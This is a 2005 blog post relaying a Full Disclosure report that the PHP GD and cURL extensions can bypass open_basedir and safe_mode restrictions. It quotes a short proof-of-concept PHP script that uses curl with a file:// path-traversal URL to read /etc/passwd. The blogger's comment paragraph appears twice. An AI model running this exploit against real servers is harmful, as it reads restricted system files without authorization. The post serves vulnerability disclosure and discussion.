Tuesday, October 18, 2005
openbasedir / safemode bypass via GD / cURL
on Date: Mon, 17 Oct 2005 22:55:26 +0200 a post on Full Disclosure came through to my inbox. "PHP Safedir Restriction Bypass Vulnerabilities" was its title and my reaction was weeee! after reading through the post I realized the vulnerabilities do not affect the core of PHP, but two extensions. GD, and cURL. Exerpts from the post goes as follows:
I always wondered if such an attack was even possible, since I had an understanding that extensions are run under PHP's directives. But now this is interesting -- one has to wonder how many other PHP extensions are capable of bypassing safemode/openbasedir at this instant. ¶ 10/18/2005 05:38:00 PM
...
curl openbasedir and safemode bypass.
POC:
<?php
mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("
file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd
");
$file=curl_exec($ch);
echo $file;
?>
I always wondered if such an attack was even possible, since I had an understanding that extensions are run under PHP's directives. But now this is interesting -- one has to wonder how many other PHP extensions are capable of bypassing safemode/openbasedir at this instant. ¶ 10/18/2005 05:38:00 PM